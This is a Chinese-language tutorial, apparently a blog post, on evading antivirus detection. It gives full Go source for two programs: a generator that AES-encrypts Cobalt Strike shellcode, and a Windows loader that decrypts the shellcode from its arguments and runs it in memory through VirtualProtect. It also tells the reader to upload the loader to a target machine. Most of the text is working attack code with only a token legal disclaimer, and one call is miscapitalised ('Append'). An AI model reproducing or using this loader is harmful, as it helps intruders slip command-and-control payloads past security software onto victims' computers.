請遵守法律法規，文章旨在提高安全軟件的應變策略，嚴禁非法使用。

整體利用思路：生成器生成AES加密的Shellcode, 加載器代碼中無Shellcode,參數接受。

1. 生成shellcode

以下以cs為例：attacks -> packages -> payload generator -> C

2. 加密shellcode

利用生成器生成aes加密的shellcode

package main

import (
    "bytes"
    "crypto/aes"
    "crypto/cipher"
    "encoding/base64"
    "fmt"
    "math/rand"
    "time"
)

var shellcode = []byte("xfcx48x83......")

//隨機生成key,后面用來解密的
func key(l int) string {
    str := "0123456789abcdefghijklmnopqrstuvwxyz"
    bytes := []byte(str)
    result := []byte{}
    r := rand.New(rand.NewSource(time.Now().UnixNano()))
    for i := 0; i < l; i++ {
        result = Append(result, bytes[r.Intn(len(bytes))])
    }
    return string(result)
}

//使用PKCS5進行填充用來
func PKCS5Padding(ciphertext []byte, blockSize int) []byte {
    padding := blockSize - len(ciphertext)%blockSize
    padtext := bytes.Repeat([]byte{byte(padding)}, padding)
    return append(ciphertext, padtext...)
}

//進行aes加密
func AesEncrypt(origData, key []byte) ([]byte, error) {
    block, err := aes.NewCipher(key)
    if err != nil {
        return nil, err
    }

    blockSize := block.BlockSize()
    origData = PKCS5Padding(origData, blockSize)
    blockMode := cipher.NewCBCEncrypter(block, key[:blockSize])
    crypted := make([]byte, len(origData))
    blockMode.CryptBlocks(crypted, origData)
    return crypted, nil
}

//主函數入口,對字符進行了處理
func main() {
    key1 := key(16)
    fmt.Println("Key:", key1)
    var key []byte = []byte(key1)
    aes, _ := AesEncrypt(shellcode, key)
    encoded := base64.StdEncoding.EncodeToString(aes)
    fmt.Println("Code:", encoded)
}

3. 加載器執行shellcode

上傳加載器到目標機器，并且加載shellcode解密執行

加載器代碼（通用）：

// 交叉編譯：CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build main.go

package main

import (
    "crypto/aes"
    "crypto/cipher"
    "encoding/base64"
    "os"
    "syscall"
    "unsafe"
)

//這一塊是定義一些東西去加載我們的shellcode
var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")

func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
    ret, _, _ := procVirtualProtect.Call(
        uintptr(lpAddress),
        uintptr(dwSize),
        uintptr(flNewProtect),
        uintptr(lpflOldProtect))
    return ret > 0
}

//shellcode執行函數
func Run(sc []byte) {
    f := func() {}
    var oldfperms uint32
    if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {
        panic("Call to VirtualProtect failed!")
    }
    **(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))
    var oldshellcodeperms uint32
    if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {
        panic("Call to VirtualProtect failed!")
    }
    f()
}

//同樣為了保證我們的shellcode正常運行要進行PKCS5的操作
func PKCS5UnPadding(origData []byte) []byte {
    length := len(origData)
    unpadding := int(origData[length-1])
    return origData[:(length - unpadding)]
}

//經典的aes解密操作
func AesDecrypt(crypted, key []byte) ([]byte, error) {
    block, err := aes.NewCipher(key)
    if err != nil {
        return nil, err
    }

    blockSize := block.BlockSize()
    blockMode := cipher.NewCBCDecrypter(block, key[:blockSize])
    origData := make([]byte, len(crypted))
    blockMode.CryptBlocks(origData, crypted)
    origData = PKCS5UnPadding(origData)
    return origData, nil
}

//運行主函數,主要是接受參數進行base64解碼,ase解碼,運行shellcode
func main() {
    key1 := os.Args[1]
    payload1 := os.Args[2]
    encoded2, _ := base64.StdEncoding.DecodeString(payload1)
    var key []byte = []byte(key1)
    AES, _ := AesDecrypt(encoded2, key)
    Run(AES)
}

（注意：這里可能會出錯，沒有接收到session的話多嘗試執行幾次）

4. 參考

• https://mp.weixin.qq.com/s/ycL0a4XBxReAzKD2VaQ3kg